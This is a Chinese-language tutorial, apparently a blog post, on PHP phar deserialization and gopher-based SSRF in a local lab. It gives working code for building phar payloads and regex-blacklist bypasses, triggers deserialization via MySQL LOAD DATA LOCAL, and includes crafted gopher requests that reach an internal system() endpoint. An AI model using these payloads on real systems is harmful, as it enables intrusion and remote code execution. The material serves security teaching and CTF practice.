我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。
phar协议
在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了
phar流包装器不能操作远程文件,也不能操作远程文件,因此即使禁用allow_url_fopen和allow_url_include INI选项,也允许使用phar流包装器。
官方文档示例
如何在目录下创建一个phar文件
<?php
$p = new PharData(dirname(__FILE__).'/phartest.zip', 0,'phartest',Phar::ZIP) ;
$p->addFromString('testfile.txt','this is just some test text');
// This works
echo file_get_contents('phar://phartest.zip/testfile.txt');
echo "<br>";
$f = fopen('phar://D:\\phpstudy_pro\\WWW\\phartest.zip\\testfile.txt','r');
echo $f;
运行以上代码后,我们会在网站目录下获得phartest.zip文件,并获得文件内容和fopen操作的类。
如果使用file_put_content是无法创建文件的
file_put_contents('phar://phartest.zip/testfile.txt','Thist is text for testfile.txt');
$context = stream_context_create(array('phar' =>array('compress' =>Phar::ZIP)));
file_put_contents('phar://phartest.zip/testfile.txt','Thist is text for testfile.txt',0,$context);
利用phar文件进行反序列化
<?php
//反序列化payload构造
class TestObject {
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
//将反序列化的对象放入该文件中
$o = new TestObject();
$o->data='just a test';
$phar->setMetadata($o);
//phar本质上是个压缩包,所以要添加压缩的文件和文件内容
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
使用file_get_contents查看该文件,内容如下
关于需要进行反序列化得phar文件为什么要写得这么复杂
phar文件头的识别格式是xxx+<?php __HALT_COMPILER(); ?>,只有这样的格式才能被识别为phar文件phar是压缩文件,那么压缩文件的信息就会存在第二段manifest describing,这一段是放序列化的poc- 压缩的文件的内容被存在第三段,也就是上面payload的中的
text.txt - 数字签名为该
phar的第四段
利用场景
既然知道了如何生成一个phar文件,那么就涉及到该文件的使用场景了。
很多函数都支持phar,这里偷一张图来看看
<?php
class TestObject{
function __destruct(){
echo $this->data;
}
}
unlink("phar://D:\\phpstudy_pro\\WWW\\phar.phar\\test.txt");
?>
上面的代码,在对象被销毁时会触发__destruct()方法,输出TestObject类对应对象的data属性。这里使用unlink包含了刚刚生成的phar文件,可以看到反序列化成功,网页上输出了字段just a test
此外,还有其他的协议写法,如果我们像下面这样设置黑名单,是不是就完全避免了phar反序列化呢
if(preg_match("/^phar/i",$data)){
die("no");
}
并不是,这里的协议不止这一种写法。
data=php://filter/read=convert.base64-encode/resource=phar://D:\phpstudy_pro\WWW\phar.phar\test.txt
compress.zlib://phar://D:\phpstudy_pro\WWW\phar.phar\test.txt
这样也是可以完成发序列化的,只不过使用协议进行套娃要注意函数是否支持这种协议。如果我们这里再使用unlink来处理data这个数据,那么就会报错。
mysql触发phar反序列化
在Web环境中,客户从Web服务器连接,用户可以使用LOAD DATA LOCAL来读取Web服务器进程有读访问权限的任何文件(假定用户可以运行SQL服务器的任何命令)
可以看到这里虽然有点小问题,但是还是插入了数据。
这里只需要将刚才脚本的include部分修改为执行mysql查询的语句即可。
<?php
class TestObject{
function __destruct(){
echo $this->data;
}
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', 'root', 'sectest', 3306);
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://D:\phpstudy_pro\WWW\phar.phar\test.txt\' INTO TABLE users');
?>
由此可得,任何支持phar协议进行文件操作的地方,都可能触发这样的漏洞。
gopher协议
简单使用该协议
gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议
那么如何使用该协议发起一个gopher请求呢,和http请求类似,我们使用curl发包,最后服务端也能获得数据。
<?php echo $_GET['name'];?>
使用gopher向服务端发起GET请求
curl gopher://192.168.50.121:80/_GET%20/index.php%3fname=SleepU12%20HTTP/1.1%0d%0AHost:%20192.168.50.121%0d%0A
使用gopher协议发起post请求
curl gopher://192.168.50.121:80/_POST%20/index.php%20HTTP/1.1%0d%0AHost:192.168.50.121%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:13%0d%0A%0d%0Aname=SleepU12%0d%0A
使用gopher协议攻击内网主机
ubuntu: 10.0.2.15
windows: 192.168.50.121
ubuntu上的apache服务器提供的php web服务
<?php
highlight_file(__FILE__);
$x = $_GET['x'];
$pos = strpos($x,"php");
if($pos){
exit("denied");
}
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$x");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
echo $result;
?>
这里抄了一道ctf题,如果要绕过上面的strpos,可以使用ph%2570
http://10.0.2.15/index.php?x=http://192.168.50.121
可以看到windows上php服务的详细信息
<?php
highlight_file(__FILE__);
system($_GET['a']);
?>
这里我们就可以利用ubuntu web服务器上的SSRF漏洞来攻击windows上的web服务器了
gopher%3a%2f%2f192.168.50.121%3a80%2f_GET%2520%2findex.php%253fa%3dcalc%2520HTTP%2f1.1%250d%250Ahost%3a%2520192.168.50.121%250d%250A
注意: 这里的参数进行了url编码,同时要避免参数中的大写字母被转为了小写
可以看到,这里我们调出了计算器
